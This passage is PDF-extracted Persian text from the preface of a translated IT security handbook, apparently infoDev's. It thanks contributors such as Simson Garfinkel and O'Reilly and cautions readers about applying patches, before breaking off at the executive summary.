‫ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ‪-‬‬
‫ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﻣﻨﺘﺸﺮ ﻭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻮﺯﻳﻊ ﻧﻤﻮﺩ‪.‬‬
‫ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳﺮﻳﻊ ﻭ ﺩﺭﺣـﺎﻝ ﭘﻴـﺸـﺮﻓﺖ ﺍﻣـﺮﻭﺯ‪ ،‬ﺗـﺪﻭﻳﻦ ﮐﺘـﺎﺏ‬
‫ﺭﺍﻫﻨﻤﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻳﻦ ﺧﻄﺮ ﺍﺳﺖ ﻛﻪ ﺍﻧﺪﻛﻲ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﺯ‬
‫ﺭﺩﻩ ﺧﺎﺭﺝ ﻭ ﻗﺪﻳﻤﻲ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ‬
‫ﻛﺘــﺎﺏ ﺗﻤــﺎﻣﻲ ﺑﺨــﺸﻬﺎﻱ ﺁﻥ ﺩﺭ ﻳــﻚ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺑــﻪ ﺁﺩﺭﺱ‬
‫‪ www.infodev-security.net‬ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ ﺗﺎ ﻫﺮﻳﻚ ﺭﺍ‬
‫ﺑﺘﻮﺍﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﻮﺩ‪ .‬ﺧﻮﺍﻧﻨـﺪﮔﺎﻧﻲ ﻛـﻪ ﻣﺎﻳـﻞ ﺑـﻪ‬
‫ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻣﻄﺎﻟﺐ ﻣﻔﻴﺪ ﺩﺭ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﺷـﻨﺪ‬
‫ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘﻴــﺸﻨﻬﺎﺩﺍﺕ ﺧــﻮﺩ ﺭﺍ ﺑــﻪ ﺁﺩﺭﺱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‬
‫‪ [email protected]‬ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﺎﭼﺎﺭ ﺑﻪ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴﺎﻥ ﺍﺻـﻮﻝ‬
‫ﻛﻠﻲ‪ ،‬ﻧﻤﻮﻧﻪﻫﺎﻱ ﻭﻳﮋﻩ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻲ ﺑﻮﺩﻩﺍﻳﻢ ﻭ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ‬
‫ﻛﻪ ﺗﻮﺍﺯﻥ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺍﺯ ﺗﻨﺎﺳﺐ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮﭼـﻪ ﺑـﺎ‬
‫ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻜﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻧﻴﺰ ﺗﻐﻴﻴﺮ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪،‬‬
‫ﺍﻣﺎ ﺍﻳﻦ ﺍﺻﻮﻝ ﻫﻤﻮﺍﺭﻩ ﺛﺎﺑﺖ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ ﻭ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﺍﺯ ﻧﻈـﺮ‬
‫ﺳﻴﺎﺳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﺁﺳـﺎﻥ‬
‫ﺁﻧﻬﺎ ﻣـﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﮔـﺮ ﺍﻳـﻦ ﺍﺻـﻮﻝ ﺑـﺪﻗﺖ ﺩﺭﻙ ﺷـﻮﻧﺪ ﺁﻧﮕـﺎﻩ‬
‫ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ ﺑﺴﺎﺩﮔﻲ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺪﻭﻥ ﺣﻤﺎﻳﺖ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻭ ﻣﺆﺳـﺴﺎﺕ‬
‫ﻭﻳــﮋﻩ ﻭ ﻣﻬــﻢ ﻫﻴﭽﮕــﺎﻩ ﻣﻤﻜــﻦ ﻧﺒــﻮﺩ‪ ،‬ﺍﺯ ﺟﻤﻠــﻪ ﺳﻴﻤــﺴﻮﻥ‬
‫ﮔﺎﺭﻓﻴﻨﻜﻞ‪ ،١٣‬ﻛﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻣﻬﻤﻲ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳـﺎﺧﺘﺎﺭ ﺍﻭﻟﻴـﺔ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻤﻮﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ‬
‫ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﻴﻢ ﺗﻬﻴﻪﻛﻨﻨﺪﮔﺎﻥ ﻛﺘﺎﺏ ﻛﻤـﻚ ﻛـﺮﺩ‪ .‬ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ‬
‫‪Cyber-Security‬‬
‫‪Simson Garfinkel‬‬
‫‪12‬‬
‫‪13‬‬
‫‪١٧‬‬
‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬
‫ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﺪﻭﻥ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻭ ﻛﻤﻚ ﺍﻭ ﻣﻴﺴﺮ ﻧﻤﻲﺷﺪ‪ .‬ﺑﺮﻭﻧـﻮ‬
‫ﻟﻨﻮﻳﻦ‪ ،١٤‬ﻣﺪﻳﺮ ‪ infoDev‬ﻛﻪ ﺍﻋﺘﺒـﺎﺭﺍﺕ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﺗﻔﻬـﻴﻢ‬
‫ﻣﻨﺎﺳﺒﺖ ﻭ ﻗﺪﺭﺕ ﺧﻠﻖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﺯﻳﻊ ﺁﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩ؛ ﻫﻤﭽﻨﻴﻦ ﮊﺍﻛﻠﻴﻦ ﺩﻭﺑـﻮ‪،١٥‬‬
‫ﺍﻟﻲ ﺍﻟﻮﻱ‪ ،١٦‬ﺗﺮﻱ ﻧﺎﻛﺎﺯﻝ‪ ١٧‬ﻭ ﻫﺮﻳﺮﻱ ﺑﺮﺗـﺎﺩﻭ‪ ١٨‬ﻛـﻪ ﻫﻤﮕـﻲ ﺍﺯ‬
‫ﻣﺪﻳﺮﺍﻥ ‪ infoDev‬ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺗـﻴﻢ ﺍﻭﺭﻳﻠـﻲ ﻛـﻪ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺷﺮﻛﺖ ﺧﻮﺩ ﺑﻪ ﻧﺎﻡ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ‪ ١٩‬ﺩﻭ ﻛﺘـﺎﺏ ﺯﻳـﺮ ﺭﺍ ﻣﻨﺘـﺸﺮ‬
‫ﻛﺮﺩﻧﺪ ﻧﻴﺰ ﺗﺸﻜﺮ ﻣﻲﻛﻨﻴﻢ‪ :‬ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﻳﻮﻧﻴﻜﺲ‪،٢٠‬‬
‫ﻭﻳﺮﺍﻳﺶ ﺳﻮﻡ )ﺳﻴﻤﺴﻮﻥ ﮔﺎﺭﻓﻴﻨﻜـﻞ‪ ،‬ﮊﻥ ﺍﺳـﭙﺎﻓﻮﺭﺩ‪ ٢١‬ﻭ ﺁﻟـﻦ ﺷـﻮﺍﺭﺗﺰ‪،٢٢‬‬
‫‪٢٣‬‬
‫ﭼﺎﭖ ‪ (۲۰۰۳‬ﻭ ﺍﻣﻨﻴـﺖ ﻭﺏ‪ ،‬ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ ﺗﺠـﺎﺭﺕ )ﺳﻴﻤـﺴﻮﻥ‬
‫ﮔﺎﺭﻓﻴﻨﻜﻞ ﻭ ﮊﻥ ﺍﺳﭙﺎﻓﻮﺭﺩ‪ ،‬ﭼﺎﭖ ‪ .(۲۰۰۲‬ﺍﻳـﻦ ﻛﺘﺎﺑﻬـﺎ ﺑـﺮﺍﻱ ﺗﻜﻤﻴـﻞ‬
‫ﺑﺨﺸﻬﺎﻱ ﻣﻬﻤـﻲ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺭﺍﻫﻨﻤـﺎ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﻭ ﭼﻨﺪ ﺑﺨﺶ ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎ ﻛﺴﺐ ﻣﺠﻮﺯ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ‬
‫ﻧﺎﺷﺮﺍﻥ ﺑﺮﺍﻱ ﭼﺎﭖ ﻣﺠﺪﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺷﺮﻛﺖ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺩﺭ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴـﺮ ﺩﻫﻬـﺎ‬
‫ﻫﺰﺍﺭ ﻋﻨﻮﺍﻥ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻨﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺮﺩﻡ ﻛﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛﻪ ﻭﺿﻌﻴﺖ ﻛﺘﺎﺑﻬﺎ ﻭ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﺩﺭ ﺟﻬـﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺭﺍ‬
‫ﺩﻳﺪﻩﺍﻧﺪ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻣﺸﺎﺭﻛﺖ ﺍﻭﺭﻟﻲ ﺩﺭ ﺳﻴﺮ ﺗﻮﺍﻧﻤﻨـﺪﻱ ﻋﻠﻤـﻲ‬
‫ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺁﺷﻨﺎﻳﻲ‪ ،‬ﭘﺨﺶ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ‬
‫ﻟﺬﺍ ﻛﺎﻫﺶ ﺷﻜﺎﻑ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻘﺪﺭ ﻣﺆﺛﺮ ﻭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺑـﻮﺩﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﮔﺮﺩﺁﻭﺭﻧﺪﮔﺎﻥ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻮﻕﺍﻟﺬﻛﺮ ﺑﺮﺍﻱ‬
‫ﻛﻤــﻚ ﺷﺎﻳــﺴﺘﻪ ﻭ ﻣــﺸﺘﺎﻗﺎﻧﻪ ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟــﺐ‬
‫ﻛﺘﺎﺑﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻪ ﮔﺮﻣﻲ ﺗـﺸﻜﺮ‬
‫ﻛﻨﻴﻢ‪ .‬ﺷﻮﺭ ﻭ ﺍﺷﺘﻴﺎﻕ ﺁﻧﺎﻥ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﺭﺍﻫﻨﻤﺎ ﺑﻬﺘﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻫﻤﻜﺎﺭﻱ ﺗﺨﺼﺼﻲ ﻭ ﺑﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ‬
‫ﻲ ﺍﻣﺮﻭﺯ ﺍﺳﺖ‪.‬‬
‫ﻦ ﺍﻳﻨﺘﺮﻧﺘ ﹺ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺗﻤﺪﻥ ﻧﻮﻳ ﹺ‬
‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻻﺯﻡ ﻣـﻲﺩﺍﻧـﻴﻢ ﺍﺯ ﺗـﺎﻡ ﻛﻠـﺮﻣﻦ‪ ،٢٤‬ﻣﺘﺨـﺼﺺ ﺍﺭﺷـﺪ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺩﺍﺩﻩﻫﺎ‪ ٢٥‬ﺩﺭ ﺗﻴﻢ ﺍﻣﻨﻴﺖ ﺧﺰﺍﻧﺔ ﺑﺨﺶ ﺳﻴﺎﺳﺖ‬
‫‪Bruno Lanvin‬‬
‫‪Jacquelin Dubow‬‬
‫‪Ellie Alavi‬‬
‫‪Teri Nachazel‬‬
‫‪Heriri Bretadeau‬‬
‫‪O’Reilly & Associates‬‬
‫‪rd‬‬
‫‪Practical Unix and Internet Security 3 Edition‬‬
‫‪Gene Spafford‬‬
‫‪Alan Schwartz‬‬
‫‪Web Security, Privacy & Commerce‬‬
‫‪Tom Kellermann‬‬
‫‪14‬‬
‫‪15‬‬
‫‪16‬‬
‫‪17‬‬
‫‪18‬‬
‫‪19‬‬
‫‪20‬‬
‫‪21‬‬
‫‪22‬‬
‫‪23‬‬
‫‪24‬‬
‫ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‪ ٢٦‬ﻧﻴﺰ ﺗﺸﻜﺮ ﻧﻤﺎﻳﻴﻢ‪ .‬ﻧﻮﺷﺘﻪ ﻫـﺎﻱ ﻭﻱ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،٢٧‬ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ‪ ٢٨‬ﻭ‬
‫ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮ ﺳﻴﺎﺭ‪ ٢٩‬ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﻣﺎﻛﺲ ﺍﺷﻨﻠﻤﻦ‪ ٣٠‬ﻧﻤﺎﻳﻨﺪﺓ ﺳﻮﺋﻴﺲ ﺩﺭ ﻛﻤﻴﺘﺔ ﺗﻮﺳﻌﺔ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﺭ ﺍﺟﻼﺱ ﭼﺎﻧﮓ ﻛـﻴﻦ‪ ٣١‬ﭼـﻴﻦ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۲‬ﻧﻴـﺰ ﻳﻜـﻲ ﺍﺯ‬
‫ﺍﻭﻟﻴﻦ ﻛﺴﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﺍﻫﻤﻴﺖ ﻭ ﻓﺎﻳﺪﺓ ﺩﺳﺘﻨﺎﻣﺔ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﺍﺩ ﻭ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻭ ﺑﻮﺩ ﻛﻪ ﺑﻪ ﺣﻤﺎﻳﺖ ﺩﻭﻟﺖ ﺳﻮﺋﻴﺲ ﺍﺯ‬
‫‪ infoDev‬ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻧﺠﺎﻣﻴﺪ ﻭ ﻣﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﻳـﻦ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺗﻘﺪﻳﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ‪.‬‬
‫ﻣﺎﻳﻜﻞ ﻣﻜﻠـﻲ‪ ٣٢‬ﻧﻴـﺰ ﮔﺮﻭﻫـﻲ ﺍﺯ ﻣﺘﺨﺼـﺼﻴﻦ ﻓﻌـﺎﻝ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺗﺪﻭﻳﻦ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﺸﻜﻴﻞ ﺩﺍﺩ ﻭ ﻫﻤﻴﻦ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧـﺪ ﻛـﻪ‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺩﻗـﺖ ﻭ ﺗﻨﺎﺳـﺐ ﻧـﺴﺨﺔ‬
‫ﻧﻬﺎﻳﻲ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ؛ ﻭ ﻣـﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬـﺎﻱ‬
‫ﺳﺎﺯﻧﺪﺓ ﺍﻳﺸﺎﻥ ﺗﺸﻜﺮ ﻣـﻲﻛﻨـﻴﻢ؛ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻣﺮﺍﺗـﺐ ﺗـﺸﻜﺮ ﻭ‬
‫ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻤﺎﻣﻲ ﺩﺳﺖﺍﻧﺪﻛﺎﺭﺍﻥ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑـﻪ ﺭﻭﻧـﺪ‬
‫ﭼﺎﭖ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻤﻚ ﻛﺮﺩﻧﺪ ﺍﻋﻼﻡ ﻣﻲﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻪ ﻣﺮﺟﻌﻲ ﺁﻣﻮﺯﺷـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ‬
‫‪ Windows ،Unix‬ﻳــﺎ ‪ Macintosh‬ﺍﺳــﺖ ﻭ ﻧــﻪ ﻣﺮﺟﻌــﻲ‬
‫ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺩﺭ ﻛﻨـﺎﺭ ﺭﺍﻫﻨﻤﺎﻫـﺎﻱ‬
‫ﺭﺍﻫﺒﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﻣﺪﻳﺮﻳﺖ ﺗﻐﻴﻴﺮﺍﺕ ﻭﺳﻴﻊ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻛﻨﺪ‪ ،‬ﺣﺘﻲ ﺍﮔـﺮ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺭﺍﺣﺘﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ‬
‫ﺑﻪ ﻣﻨﺎﺑﻊ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺴﻴﺎﺭﻱ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩﺍﻳﻢ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ‬
‫ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻭ ﻭﺻﻠﻪﻫﺎﻱ‪ ٣٣‬ﭘﻴﺸﻨﻬﺎﺩﻱ ﻣﻮﺟﻮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺟﺎﻧﺐ ﺍﺣﺘﻴﺎﻁ ﺭﺍ ﺭﻋﺎﻳﺖ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﺑﻌﺪ ﺍﺯ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﻫـﺴﺘﻪ‪ ،٣٤‬ﻣﻌﻤـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻮﺭﺍﺕ‬
‫ﻲ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﺢ ﻛﻼﻥ ﺑﺴﺎﺩﮔﻲ‬
‫ﻲ ﺗﺄﺛﻴﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺍﺭﺯﻳﺎﺑ ﹺ‬
‫‪Senior Data Risk Management Specialist‬‬
‫‪Integrator Group and Treasury Security Team‬‬
‫‪of the Operations Policy Department‬‬
‫‪E-Finance‬‬
‫‪Blended Threats‬‬
‫‪Mobile Risk Management‬‬
‫‪Max Schnellmann‬‬
‫‪Chongqing‬‬
‫‪Michel Maechley‬‬
‫‪Patches‬‬
‫‪Kernel‬‬
‫‪25‬‬
‫‪26‬‬
‫‪27‬‬
‫‪28‬‬
‫‪29‬‬
‫‪30‬‬
‫‪31‬‬
‫‪32‬‬
‫‪33‬‬
‫‪34‬‬
‫‪١٨‬‬
‫ﻣﻴﺴﺮ ﻧﺒﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺭﺍﻩﺣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﻩﻫـﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺑﻄﻮﺭ ﻋـﺎﺩﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻳـﺎ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﺩﺭﺍﺯﻣﺪﺕ ﺳﻄﺢ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺗـﻀﻌﻴﻒ ﮔـﺮﺩﺩ؛ ﭘـﺲ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺳﺎﺯﮔﺎﺭﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺳﻴﺴﺘﻢ ﻭ ﻛﻴﻔﻴﺖ ﻭ ﺍﺷﺘﻬﺎﺭ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﺪﻣﺎﺕ ﻓﻨﻲ ﻭ ﻣﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﻧﻴﺰ ﺗﻮﺟﻪ ﻛﺮﺩ‪.‬‬
‫ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺁﺳـﺎﻥﺗـﺮ‬
‫ﻛﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﻢ ﻛـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻧﻴـﺰ ﺑـﻪ ﺑﻬﺒـﻮﺩ ﻛﻴﻔـﻲ‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩﻱ ﺟﻬـﺖ‬
‫ﻓﻬﻢ ﻭ ﺍﺟﺮﺍﻱ ﮔﺎﻣﻬﺎﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺣﻮﺯﺓ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﮔﺮﭼـﻪ ﺍﻳـﻦ‬
